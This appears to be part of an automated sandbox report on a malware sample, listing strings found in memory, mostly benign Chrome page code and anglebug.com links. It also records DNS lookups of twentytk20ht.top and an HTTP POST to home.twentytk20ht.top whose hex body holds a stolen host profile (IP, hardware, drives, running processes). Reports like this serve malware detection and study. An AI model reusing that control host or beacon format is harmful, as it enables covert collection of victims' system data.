Source: chrome.exe, 00000004.00000002.2810062084.00005E1002510000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--> equals www.facebook.com (Facebook)
Source: chrome.exe, 00000004.00000002.2810062084.00005E1002510000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--> equals www.twitter.com (Twitter)
Source: chrome.exe, 00000004.00000003.2790589501.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2789938437.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2790177381.00005E1003160000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2790589501.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2789938437.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2790177381.00005E1003160000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 502151Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 30 32 35 37 33 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000002.2813542004.00005E1002CE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577W
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814193544.00005E1002E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814193544.00005E1002E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814193544.00005E1002E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832F
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/38628
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965B
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/39703
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384&
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551:
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836&
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836)
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/48362
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000004.00000003.2787824824.00005E1002D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811847664.00005E1002984000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000004.00000002.2814225821.00005E1002E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787793422.00005E1002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
